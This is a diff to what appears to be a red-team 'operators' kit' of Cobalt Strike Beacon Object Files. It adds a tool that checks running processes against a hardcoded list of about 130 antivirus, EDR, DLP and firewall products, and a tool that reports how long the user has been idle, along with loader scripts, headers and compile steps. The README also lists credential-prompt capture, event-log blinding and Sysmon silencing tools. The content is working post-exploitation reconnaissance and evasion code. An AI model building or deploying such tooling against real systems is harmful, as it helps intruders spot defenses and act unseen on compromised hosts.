+	softwareList[14].category = L"Security";
+
+	softwareList[15].filename = "dlpagent.exe";
+	softwareList[15].description = L"Symantec DLP Agent";
+	softwareList[15].category = L"DLP";
+
+	softwareList[16].filename = "dlpsensor.exe";
+	softwareList[16].description = L"McAfee DLP Sensor";
+	softwareList[16].category = L"DLP";
+
+	softwareList[17].filename = "dsmonitor.exe";
+	softwareList[17].description = L"DriveSentry";
+	softwareList[17].category = L"Security";
+
+	softwareList[18].filename = "dwengine.exe";
+	softwareList[18].description = L"DriveSentry";
+	softwareList[18].category = L"Security";
+
+	softwareList[19].filename = "edpa.exe";
+	softwareList[19].description = L"McAfee Endpoint Security";
+	softwareList[19].category = L"AV";
+
+	softwareList[20].filename = "egui.exe";
+	softwareList[20].description = L"ESET NOD32 AV";
+	softwareList[20].category = L"AV";
+
+	softwareList[21].filename = "ekrn.exe";
+	softwareList[21].description = L"ESET NOD32 AV";
+	softwareList[21].category = L"AV";
+
+	softwareList[22].filename = "firesvc.exe";
+	softwareList[22].description = L"FireEye Endpoint Agent";
+	softwareList[22].category = L"Security";
+
+	softwareList[23].filename = "firetray.exe";
+	softwareList[23].description = L"FireEye Endpoint Agent";
+	softwareList[23].category = L"Security";
+
+	softwareList[24].filename = "fortiedr.exe";
+	softwareList[24].description = L"FortiEDR";
+	softwareList[24].category = L"EDR";
+
+	softwareList[25].filename = "fw.exe";
+	softwareList[25].description = L"Check Point Firewall";
+	softwareList[25].category = L"Firewall";
+
+	softwareList[26].filename = "hips.exe";
+	softwareList[26].description = L"Host Intrusion Prevention System";
+	softwareList[26].category = L"HIPS";
+
+	softwareList[27].filename = "kpf4ss.exe";
+	softwareList[27].description = L"Kerio Personal Firewall";
+	softwareList[27].category = L"Firewall";
+
+	softwareList[28].filename = "mbamservice.exe";
+	softwareList[28].description = L"Malwarebytes";
+	softwareList[28].category = L"AV";
+
+	softwareList[29].filename = "mbamtray.exe";
+	softwareList[29].description = L"Malwarebytes";
+	softwareList[29].category = L"AV";
+
+	softwareList[30].filename = "mcshield.exe";
+	softwareList[30].description = L"McAfee VirusScan";
+	softwareList[30].category = L"AV";
+
+	softwareList[31].filename = "mfefire.exe";
+	softwareList[31].description = L"McAfee Host Intrusion Prevention";
+	softwareList[31].category = L"HIPS";
+
+	softwareList[32].filename = "msascuil.exe";
+	softwareList[32].description = L"Windows Defender";
+	softwareList[32].category = L"AV";
+
+	softwareList[33].filename = "msmpeng.exe";
+	softwareList[33].description = L"Windows Defender";
+	softwareList[33].category = L"AV";
+
+	softwareList[34].filename = "msseces.exe";
+	softwareList[34].description = L"Microsoft Security Essentials";
+	softwareList[34].category = L"AV";
+
+	softwareList[35].filename = "nissrv.exe";
+	softwareList[35].description = L"Microsoft Security Essentials";
+	softwareList[35].category = L"AV";
+
+	softwareList[36].filename = "outpost.exe";
+	softwareList[36].description = L"Agnitum Outpost Firewall";
+	softwareList[36].category = L"Firewall";
+
+	softwareList[37].filename = "panda_url_filtering.exe";
+	softwareList[37].description = L"Panda Security";
+	softwareList[37].category = L"AV";
+
+	softwareList[38].filename = "pavfnsvr.exe";
+	softwareList[38].description = L"Panda Security";
+	softwareList[38].category = L"AV";
+
+	softwareList[39].filename = "pavsrv.exe";
+	softwareList[39].description = L"Panda Security";
+	softwareList[39].category = L"AV";
+
+	softwareList[40].filename = "psanhost.exe";
+	softwareList[40].description = L"Panda Security";
+	softwareList[40].category = L"AV";
+
+	softwareList[41].filename = "rtvscan.exe";
+	softwareList[41].description = L"Symantec Endpoint Protection";
+	softwareList[41].category = L"AV";
+
+	softwareList[42].filename = "savservice.exe";
+	softwareList[42].description = L"Sophos Endpoint Security";
+	softwareList[42].category = L"AV";
+
+	softwareList[43].filename = "shstat.exe";
+	softwareList[43].description = L"McAfee VirusScan";
+	softwareList[43].category = L"AV";
+
+	softwareList[44].filename = "sophosav.exe";
+	softwareList[44].description = L"Sophos Endpoint Security";
+	softwareList[44].category = L"AV";
+
+	softwareList[45].filename = "sophossps.exe";
+	softwareList[45].description = L"Sophos Endpoint Security";
+	softwareList[45].category = L"AV";
+
+	softwareList[46].filename = "sophosui.exe";
+	softwareList[46].description = L"Sophos Endpoint Security";
+	softwareList[46].category = L"AV";
+
+	softwareList[47].filename = "sysmon.exe";
+	softwareList[47].description = L"Microsoft Sysmon";
+	softwareList[47].category = L"Security";
+
+	softwareList[48].filename = "tanclient.exe";
+	softwareList[48].description = L"Tanium EDR";
+	softwareList[48].category = L"EDR";
+
+	softwareList[49].filename = "tmntsrv.exe";
+	softwareList[49].description = L"Trend Micro OfficeScan";
+	softwareList[49].category = L"AV";
+
+	softwareList[50].filename = "tmproxy.exe";
+	softwareList[50].description = L"Trend Micro OfficeScan";
+	softwareList[50].category = L"AV";
+
+	softwareList[51].filename = "trapsagent.exe";
+	softwareList[51].description = L"Palo Alto Networks Cortex XDR";
+	softwareList[51].category = L"XDR";
+
+	softwareList[52].filename = "trapsd.exe";
+	softwareList[52].description = L"Palo Alto Networks Cortex XDR";
+	softwareList[52].category = L"XDR";
+
+	softwareList[53].filename = "truecrypt.exe";
+	softwareList[53].description = L"TrueCrypt";
+	softwareList[53].category = L"Encryption";
+
+	softwareList[54].filename = "vsserv.exe";
+	softwareList[54].description = L"Bitdefender Total Security";
+	softwareList[54].category = L"AV";
+
+	softwareList[55].filename = "wrsa.exe";
+	softwareList[55].description = L"Webroot Anywhere";
+	softwareList[55].category = L"AV";
+
+	softwareList[56].filename = "windefend.exe";
+	softwareList[56].description = L"Windows Defender";
+	softwareList[56].category = L"AV";
+
+	softwareList[57].filename = "xagt.exe";
+	softwareList[57].description = L"FireEye HX";
+	softwareList[57].category = L"Security";
+
+	softwareList[58].filename = "ahnsd.exe";
+	softwareList[58].description = L"AhnLab V3 Internet Security";
+	softwareList[58].category = L"AV";
+
+	softwareList[59].filename = "amsiagent.exe";
+	softwareList[59].description = L"Bromium AMSI Agent";
+	softwareList[59].category = L"Security";
+
+	softwareList[60].filename = "avkwctl.exe";
+	softwareList[60].description = L"K7 Total Security";
+	softwareList[60].category = L"AV";
+
+	softwareList[61].filename = "avmailc.exe";
+	softwareList[61].description = L"Avira MailGuard";
+	softwareList[61].category = L"AV";
+
+	softwareList[62].filename = "avgemc.exe";
+	softwareList[62].description = L"AVG Email Scanner";
+	softwareList[62].category = L"AV";
+
+	softwareList[63].filename = "avgidsagent.exe";
+	softwareList[63].description = L"AVG Identity Protection";
+	softwareList[63].category = L"Security";
+
+	softwareList[64].filename = "avkmgr.exe";
+	softwareList[64].description = L"K7 Total Security";
+	softwareList[64].category = L"AV";
+
+	softwareList[65].filename = "avshadow.exe";
+	softwareList[65].description = L"Avira Shadow Copy Service";
+	softwareList[65].category = L"AV";
+
+	softwareList[66].filename = "avwebgrd.exe";
+	softwareList[66].description = L"Avira Web Protection";
+	softwareList[66].category = L"AV";
+
+	softwareList[67].filename = "bavtray.exe";
+	softwareList[67].description = L"Baidu Antivirus";
+	softwareList[67].category = L"AV";
+
+	softwareList[68].filename = "bavupdat.exe";
+	softwareList[68].description = L"Baidu Antivirus Updater";
+	softwareList[68].category = L"AV";
+
+	softwareList[69].filename = "bdredline.exe";
+	softwareList[69].description = L"Bitdefender Redline";
+	softwareList[69].category = L"AV";
+
+	softwareList[70].filename = "bdsubwiz.exe";
+	softwareList[70].description = L"Bitdefender Submission Wizard";
+	softwareList[70].category = L"AV";
+
+	softwareList[71].filename = "cfp.exe";
+	softwareList[71].description = L"COMODO Firewall";
+	softwareList[71].category = L"Firewall";
+
+	softwareList[72].filename = "cmdagent.exe";
+	softwareList[72].description = L"COMODO Internet Security";
+	softwareList[72].category = L"AV";
+
+	softwareList[73].filename = "csavtray.exe";
+	softwareList[73].description = L"Centennial Endpoint Security";
+	softwareList[73].category = L"AV";
+
+	softwareList[74].filename = "csinsm32.exe";
+	softwareList[74].description = L"Centennial Endpoint Security";
+	softwareList[74].category = L"AV";
+
+	softwareList[75].filename = "fprot.exe";
+	softwareList[75].description = L"F-Prot Antivirus";
+	softwareList[75].category = L"AV";
+
+	softwareList[76].filename = "fpwin.exe";
+	softwareList[76].description = L"F-Prot Antivirus";
+	softwareList[76].category = L"AV";
+
+	softwareList[77].filename = "frzstate2k.exe";
+	softwareList[77].description = L"Faronics Deep Freeze";
+	softwareList[77].category = L"Security";
+
+	softwareList[78].filename = "gdatpagent.exe";
+	softwareList[78].description = L"Symantec Data Loss Prevention";
+	softwareList[78].category = L"DLP";
+
+	softwareList[79].filename = "gfiarksvc.exe";
+	softwareList[79].description = L"GFI LanGuard";
+	softwareList[79].category = L"Security";
+
+	softwareList[80].filename = "gfiarktray.exe";
+	softwareList[80].description = L"GFI LanGuard";
+	softwareList[80].category = L"Security";
+
+	softwareList[81].filename = "hexisagent.exe";
+	softwareList[81].description = L"Hexis HawkEye G";
+	softwareList[81].category = L"EDR";
+
+	softwareList[82].filename = "hexiscybereye.exe";
+	softwareList[82].description = L"Hexis CyberEye";
+	softwareList[82].category = L"Security";
+
+	softwareList[83].filename = "k7avtray.exe";
+	softwareList[83].description = L"K7 Total Security";
+	softwareList[83].category = L"AV";
+
+	softwareList[84].filename = "k7rtscan.exe";
+	softwareList[84].description = L"K7 Total Security";
+	softwareList[84].category = L"AV";
+
+	softwareList[85].filename = "k7uascan.exe";
+	softwareList[85].description = L"K7 Total Security";
+	softwareList[85].category = L"AV";
+
+	softwareList[86].filename = "k7upschdl.exe";
+	softwareList[86].description = L"K7 Total Security";
+	softwareList[86].category = L"AV";
+
+	softwareList[87].filename = "k7wscsvc.exe";
+	softwareList[87].description = L"K7 Total Security";
+	softwareList[87].category = L"AV";
+
+	softwareList[88].filename = "k7wscwiz.exe";
+	softwareList[88].description = L"K7 Total Security";
+	softwareList[88].category = L"AV";
+
+	softwareList[89].filename = "languard.exe";
+	softwareList[89].description = L"GFI LanGuard";
+	softwareList[89].category = L"Security";
+
+	softwareList[90].filename = "mbae.exe";
+	softwareList[90].description = L"Malwarebytes Anti-Exploit";
+	softwareList[90].category = L"Security";
+
+	softwareList[91].filename = "nxclient.exe";
+	softwareList[91].description = L"Nexusguard Endpoint Protection";
+	softwareList[91].category = L"AV";
+
+	softwareList[92].filename = "nxtray.exe";
+	softwareList[92].description = L"Nexusguard Endpoint Protection";
+	softwareList[92].category = L"AV";
+
+	softwareList[93].filename = "panda_tpsrv.exe";
+	softwareList[93].description = L"Panda Security";
+	softwareList[93].category = L"AV";
+
+	softwareList[94].filename = "pcmaticrt.exe";
+	softwareList[94].description = L"PC Matic Real-Time";
+	softwareList[94].category = L"AV";
+
+	softwareList[95].filename = "pcmatrtsystray.exe";
+	softwareList[95].description = L"PC Matic";
+	softwareList[95].category = L"AV";
+
+	softwareList[96].filename = "pclxav.exe";
+	softwareList[96].description = L"PC-Linq AntiVirus";
+	softwareList[96].category = L"AV";
+
+	softwareList[97].filename = "pcmaticsvc.exe";
+	softwareList[97].description = L"PC Matic";
+	softwareList[97].category = L"AV";
+
+	softwareList[98].filename = "qhpserver.exe";
+	softwareList[98].description = L"Qihoo 360 Total Security";
+	softwareList[98].category = L"AV";
+
+	softwareList[99].filename = "qihoo_ts.exe";
+	softwareList[99].description = L"Qihoo 360 Total Security";
+	softwareList[99].category = L"AV";
+
+	softwareList[100].filename = "sbamsvc.exe";
+	softwareList[100].description = L"VIPRE Antivirus";
+	softwareList[100].category = L"AV";
+
+	softwareList[101].filename = "sbamtray.exe";
+	softwareList[101].description = L"VIPRE Antivirus";
+	softwareList[101].category = L"AV";
+
+	softwareList[102].filename = "sbamui.exe";
+	softwareList[102].description = L"VIPRE Antivirus";
+	softwareList[102].category = L"AV";
+
+	softwareList[103].filename = "sfc.exe";
+	softwareList[103].description = L"System File Checker";
+	softwareList[103].category = L"Security";
+
+	softwareList[104].filename = "smc.exe";
+	softwareList[104].description = L"Symantec Endpoint Protection";
+	softwareList[104].category = L"AV";
+
+	softwareList[105].filename = "sophoscleaner.exe";
+	softwareList[105].description = L"Sophos Virus Removal Tool";
+	softwareList[105].category = L"AV";
+
+	softwareList[106].filename = "sophoshealth.exe";
+	softwareList[106].description = L"Sophos Endpoint Security";
+	softwareList[106].category = L"AV";
+
+	softwareList[107].filename = "sophosinstaller.exe";
+	softwareList[107].description = L"Sophos Endpoint Security";
+	softwareList[107].category = L"AV";
+
+	softwareList[108].filename = "sophosmcsagentd.exe";
+	softwareList[108].description = L"Sophos Endpoint Security";
+	softwareList[108].category = L"AV";
+
+	softwareList[109].filename = "sophosntivirus.exe";
+	softwareList[109].description = L"Sophos Endpoint Security";
+	softwareList[109].category = L"AV";
+
+	softwareList[110].filename = "swdoctor.exe";
+	softwareList[110].description = L"Spyware Doctor";
+	softwareList[110].category = L"AV";
+
+	softwareList[111].filename = "swupdate.exe";
+	softwareList[111].description = L"Spyware Doctor";
+	softwareList[111].category = L"AV";
+
+	softwareList[112].filename = "symcorpui.exe";
+	softwareList[112].description = L"Symantec Endpoint Protection";
+	softwareList[112].category = L"AV";
+
+	softwareList[113].filename = "symerr.exe";
+	softwareList[113].description = L"Symantec Endpoint Protection";
+	softwareList[113].category = L"AV";
+
+	softwareList[114].filename = "symlcsvc.exe";
+	softwareList[114].description = L"Symantec Endpoint Protection";
+	softwareList[114].category = L"AV";
+
+	softwareList[115].filename = "symwsc.exe";
+	softwareList[115].description = L"Symantec Endpoint Protection";
+	softwareList[115].category = L"AV";
+
+	softwareList[116].filename = "tsmains.exe";
+	softwareList[116].description = L"Tencent PC Manager";
+	softwareList[116].category = L"AV";
+
+	softwareList[117].filename = "tsvncache.exe";
+	softwareList[117].description = L"Tencent PC Manager";
+	softwareList[117].category = L"AV";
+
+	softwareList[118].filename = "umbrella.exe";
+	softwareList[118].description = L"Cisco Umbrella";
+	softwareList[118].category = L"Security";
+
+	softwareList[119].filename = "umbrella_roamingclient.exe";
+	softwareList[119].description = L"Cisco Umbrella Roaming Client";
+	softwareList[119].category = L"Security";
+
+	softwareList[120].filename = "viprerestart.exe";
+	softwareList[120].description = L"VIPRE Antivirus";
+	softwareList[120].category = L"AV";
+
+	softwareList[121].filename = "vpc.exe";
+	softwareList[121].description = L"Virus Protection Center";
+	softwareList[121].category = L"AV";
+
+	softwareList[122].filename = "webinspect.exe";
+	softwareList[122].description = L"HP WebInspect";
+	softwareList[122].category = L"Security";
+
+	softwareList[123].filename = "webrootsecureanywhere.exe";
+	softwareList[123].description = L"Webroot SecureAnywhere";
+	softwareList[123].category = L"AV";
+
+	softwareList[124].filename = "wpctrl.exe";
+	softwareList[124].description = L"Webroot Parental Controls";
+	softwareList[124].category = L"Security";
+
+	softwareList[125].filename = "wpff.exe";
+	softwareList[125].description = L"Webroot Parental Controls";
+	softwareList[125].category = L"Security";
+
+	softwareList[126].filename = "wscsvc.exe";
+	softwareList[126].description = L"Windows Security Center";
+	softwareList[126].category = L"Security";
+
+	softwareList[127].filename = "zanda.exe";
+	softwareList[127].description = L"ZoneAlarm Antivirus";
+	softwareList[127].category = L"AV";
+
+	softwareList[128].filename = "zatutor.exe";
+	softwareList[128].description = L"ZoneAlarm Antivirus";
+	softwareList[128].category = L"AV";
+
+	softwareList[129].filename = "zlclient.exe";
+	softwareList[129].description = L"ZoneAlarm Security Suite";
+	softwareList[129].category = L"AV";
+	//End security product list
+
+
+	//get list of running processes 
+	procHandle = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+    if (procHandle == INVALID_HANDLE_VALUE) {
+        return false;
+    }
+
+    pe32.dwSize = sizeof(PROCESSENTRY32);
+    if (!KERNEL32$Process32First(procHandle, &pe32)) {
+        KERNEL32$CloseHandle(procHandle);
+        return false;
+    }
+	
+	//compare list with running processes
+	BeaconPrintToStreamW(L"\nDescription\t\t\t\t\tCategory\n");
+	BeaconPrintToStreamW(L"===============================================================\n");
+    do {
+        char procName[MAX_PATH];
+        MSVCRT$strcpy(procName, pe32.szExeFile);
+        for (size_t i = 0; procName[i]; i++) {
+            procName[i] = MSVCRT$tolower(procName[i]); 
+        }
+
+        for (size_t i = 0; i < numSoftware; i++) {
+            if (MSVCRT$strcmp(procName, softwareList[i].filename) == 0) {
+                foundSecProduct = true;
+                BeaconPrintToStreamW(L"%-50ls\t%ls\n", softwareList[i].description, softwareList[i].category);
+                break;
+            }
+        }
+    } while (KERNEL32$Process32Next(procHandle, &pe32));
+
+    KERNEL32$CloseHandle(procHandle);
+	KERNEL32$VirtualFree(softwareList, 0, MEM_RELEASE);
+
+    return foundSecProduct;
+}
+
+
+int go() {
+    if (CheckSecProc()) {
+		BeaconOutputStreamW();
+        BeaconPrintf(CALLBACK_OUTPUT,"\n[+] Finished enumerating security products.\n");
+    } else {
+        BeaconPrintf(CALLBACK_OUTPUT,"\n[+] No security products from the list were found on the system!\n");
+    }
+    return 0;
+}

KIT/EnumSecProducts/enumsecproducts.cna

@@ -0,0 +1,18 @@
+# author REDMED-X
+
+beacon_command_register(
+	"enumsecproducts", "List security products running on the system.",
+	"INFO:\nGet a list of security products (like AV/EDR) that are running on the system. This is done by comparing running processes against a hardcoded list of 130 security products.\n\n" .
+	"USAGE:\nenumsecproducts\n\n");
+	
+alias enumsecproducts {
+    $bid = $1;
+
+    # Read in the right BOF file
+    $handle = openf(script_resource("enumsecproducts.o"));
+    $data = readb($handle, -1);
+    closef($handle);
+
+	blog($bid, "Tasked to list running security products..");
+    beacon_inline_execute($bid, $data, "go", $null);
+}

KIT/EnumSecProducts/enumsecproducts.h

@@ -0,0 +1,33 @@
+#include <windows.h>  
+
+//CheckSecProc
+DECLSPEC_IMPORT void * WINAPI KERNEL32$VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
+DECLSPEC_IMPORT int WINAPI KERNEL32$VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
+DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD, DWORD th32ProcessID);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
+DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
+DECLSPEC_IMPORT char* __cdecl MSVCRT$strcpy(char* _Dest, const char* _Source);
+DECLSPEC_IMPORT int __cdecl MSVCRT$tolower(int _C);
+WINBASEAPI int __cdecl MSVCRT$strcmp(const char *str1, const char *str2);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...);
+
+//BeaconPrintToStreamW + BeaconOutputStreamW
+#define MAX_STRING 8192
+INT g_iGarbage = 1;
+LPSTREAM g_lpStream = (LPSTREAM)1;
+LPWSTR g_lpwPrintBuffer = (LPWSTR)1;
+DECLSPEC_IMPORT HRESULT WINAPI OLE32$CreateStreamOnHGlobal(HGLOBAL hGlobal, BOOL fDeleteOnRelease, LPSTREAM *ppstm);
+WINBASEAPI void *__cdecl MSVCRT$calloc(size_t number, size_t size);
+WINBASEAPI int __cdecl MSVCRT$_vsnwprintf_s(wchar_t *buffer, size_t sizeOfBuffer, size_t count, const wchar_t *format, va_list argptr);
+WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str);
+WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
+WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
+WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
+WINBASEAPI void __cdecl MSVCRT$free(void *memblock);
+WINBASEAPI BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
+DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, _In_NLS_string_(cbMultiByte)LPCCH lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
+
+
+
+

KIT/IdleTime/README.md

@@ -0,0 +1,15 @@
+# ListSecProducts
+Check current user activity based on the user's last input. Returns the time in format HH:MM:SS.
+
+
+## Usage
+* `idletime`
+
+
+## Compile
+- 1\. Make sure Visual Studio is installed and supports C/C++.
+- 2\. Open the `x64 Native Tools Command Prompt for VS <2019/2022>` terminal.
+- 3\. Run the `bofcompile.bat` script to compile the object file. 
+- 4\. In Cobalt strike, use the script manager to load the .cna script to import the tool. 
+
+

KIT/IdleTime/beacon.h

@@ -0,0 +1,69 @@
+/*
+ * Beacon Object Files (BOF)
+ * -------------------------
+ * A Beacon Object File is a light-weight post exploitation tool that runs
+ * with Beacon's inline-execute command.
+ *
+ * Additional BOF resources are available here:
+ *   - https://github.com/Cobalt-Strike/bof_template
+ *
+ * Cobalt Strike 4.x
+ * ChangeLog:
+ *    1/25/2022: updated for 4.5
+ */
+
+/* data API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} datap;
+
+DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
+DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
+DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
+DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
+DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
+DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);
+
+/* format API */
+typedef struct {
+	char * original; /* the original buffer [so we can free it] */
+	char * buffer;   /* current pointer into our buffer */
+	int    length;   /* remaining length of data */
+	int    size;     /* total size of this buffer */
+} formatp;
+
+DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
+DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, char * text, int len);
+DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, char * fmt, ...);
+DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
+DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
+DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);
+
+/* Output Functions */
+#define CALLBACK_OUTPUT      0x0
+#define CALLBACK_OUTPUT_OEM  0x1e
+#define CALLBACK_OUTPUT_UTF8 0x20
+#define CALLBACK_ERROR       0x0d
+
+DECLSPEC_IMPORT void   BeaconOutput(int type, char * data, int len);
+DECLSPEC_IMPORT void   BeaconPrintf(int type, char * fmt, ...);
+
+
+/* Token Functions */
+DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
+DECLSPEC_IMPORT void   BeaconRevertToken();
+DECLSPEC_IMPORT BOOL   BeaconIsAdmin();
+
+/* Spawn+Inject Functions */
+DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
+DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
+DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
+DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
+
+/* Utility Functions */
+DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

KIT/IdleTime/bofcompile.bat

@@ -0,0 +1,6 @@
+@ECHO OFF
+
+cl.exe /nologo /c /Od /MT /W0 /GS- /Tc idletime.c
+move /y idletime.obj idletime.o
+
+

KIT/IdleTime/idletime.c

@@ -0,0 +1,35 @@
+#include <stdio.h>
+#include <windows.h>
+#include "idletime.h"
+#include "beacon.h"
+
+#pragma comment(lib, "User32.lib")
+
+
+DWORD GetIdleTimeInSeconds() {
+    LASTINPUTINFO lii;
+    lii.cbSize = sizeof(LASTINPUTINFO);
+    USER32$GetLastInputInfo(&lii);
+
+    DWORD currentTime = KERNEL32$GetTickCount();
+    DWORD lastInputTime = lii.dwTime;
+
+    return (currentTime - lastInputTime) / 1000;
+}
+
+void FormatIdleTime(DWORD idleTime, int *hours, int *minutes, int *seconds) {
+    *hours = idleTime / 3600;
+    *minutes = (idleTime % 3600) / 60;
+    *seconds = idleTime % 60;
+}
+
+
+int go() {
+    DWORD idleTime = GetIdleTimeInSeconds();
+	
+	int hours, minutes, seconds;
+    FormatIdleTime(idleTime, &hours, &minutes, &seconds);
+	
+    BeaconPrintf(CALLBACK_OUTPUT,"[+] Last user input was observed %02d:%02d:%02d ago.\n", hours, minutes, seconds);
+    return 0;
+}

KIT/IdleTime/idletime.cna

@@ -0,0 +1,18 @@
+# author REDMED-X
+
+beacon_command_register(
+	"idletime", "Check current user activity based on the user's last input",
+	"INFO:\nCheck current user activity based on the user's last input. Returns the time in format HH:MM:SS.\n\n" .
+	"USAGE:\nidletime\n\n");
+	
+alias idletime {
+    $bid = $1;
+
+    # Read in the right BOF file
+    $handle = openf(script_resource("idletime.o"));
+    $data = readb($handle, -1);
+    closef($handle);
+
+	blog($bid, "Tasked to check user activity..");
+    beacon_inline_execute($bid, $data, "go", $null);
+}

KIT/IdleTime/idletime.h

@@ -0,0 +1,5 @@
+#include <windows.h>  
+
+DECLSPEC_IMPORT BOOL WINAPI USER32$GetLastInputInfo(PLASTINPUTINFO plii);
+DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetTickCount(void);
+WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...);

README.md

@@ -9,16 +9,19 @@ The following tools are currently in the operators' kit:
 |**[AddLocalCert](KIT/AddLocalCert)**|Add a (self signed) certificate to a specific local computer certificate store.|
 |**[AddTaskScheduler](KIT/AddTaskScheduler)**|Create a scheduled task on the current- or remote host.|
 |**[BlindEventlog](KIT/BlindEventlog)**|Blind Eventlog by suspending its threads.|
+|**[CredPrompt](KIT/CredPrompt)**|Start persistent credential prompt in an attempt to capture user credentials.|
 |**[DelLocalCert](KIT/DelLocalCert)**|Delete a local computer certificate from a specific store.|
 |**[DelTaskScheduler](KIT/DelTaskScheduler)**|Delete a scheduled task on the current- or a remote host.|
-|**[DllEnvHijacking](KIT/DllEnvHijacking)**|BOF implementation of DLL environment hijacking published by [Wietze](https://www.wietzebeukema.nl/blog/save-the-environment-variables) |
+|**[DllEnvHijacking](KIT/DllEnvHijacking)**|BOF implementation of DLL environment hijacking published by [Wietze](https://www.wietzebeukema.nl/blog/save-the-environment-variables).|
 |**[EnumLocalCert](KIT/EnumLocalCert)**|List all local computer certificates from a specific store.|
+|**[EnumSecProducts](KIT/EnumSecProducts)**|List security products (like AV/EDR) that are running on the system.|
 |**[FindDotnet](KIT/FindDotnet)**|Find processes that most likely have .NET loaded.|
 |**[FindHandle](KIT/FindHandle)**|Find "process" and "thread" handle types between processes.|
 |**[FindLib](KIT/FindLib)**|Find loaded module(s) in remote process(es).|
 |**[FindRWX](KIT/FindRWX)**|Find RWX memory regions in a target process.|
 |**[FindSysmon](KIT/FindSysmon)**|Verify if Sysmon is running through enumerating Minifilter drivers and checking the registry.|
 |**[HideFile](KIT/HideFile)**|Hide file or directory by setting it's attributes to systemfile + hidden.|
+|**[IdleTime](KIT/IdleTime)**|Check current user activity based on the user's last input.|
 |**[LoadLib](KIT/LoadLib)**|Load an on disk present DLL via RtlRemoteCall API in a remote process.|
 |**[PSremote](KIT/PSremote)**|List all running processes on a remote host.|
 |**[SilenceSysmon](KIT/SilenceSysmon)**|Silence the Sysmon service by patching its capability to write ETW events to the log.|